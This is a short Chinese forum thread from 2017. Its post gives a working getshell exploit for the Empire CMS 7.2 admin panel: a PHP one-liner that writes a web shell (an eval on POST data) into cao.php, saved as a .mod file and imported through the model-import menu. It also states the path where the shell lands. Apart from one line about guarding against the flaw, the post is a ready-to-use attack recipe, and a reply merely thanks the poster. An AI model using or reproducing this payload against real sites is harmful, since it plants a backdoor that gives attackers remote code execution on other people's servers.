yun 发表于 2017-4-14 03:11:17

帝国cms7.2后台getshell漏洞

工具/原料                                                 
帝国cms

方法/步骤                                                 
php一句话内容:
<?fputs(fopen("cao.php","w"),"<?eval(\$_POST);?>")?>
保存为1.php.mod

进入后台---系统设置---管理数据表---管理系统模型---导入新型模块

导入之后马儿就躺在了/e/admin/cao.php。



所以大家用帝国cms的要防范这个漏洞,纯属干货分享。

权利的游戏 发表于 2017-4-15 04:09:08

看看,谢谢v
页: [1]
查看完整版本: 帝国cms7.2后台getshell漏洞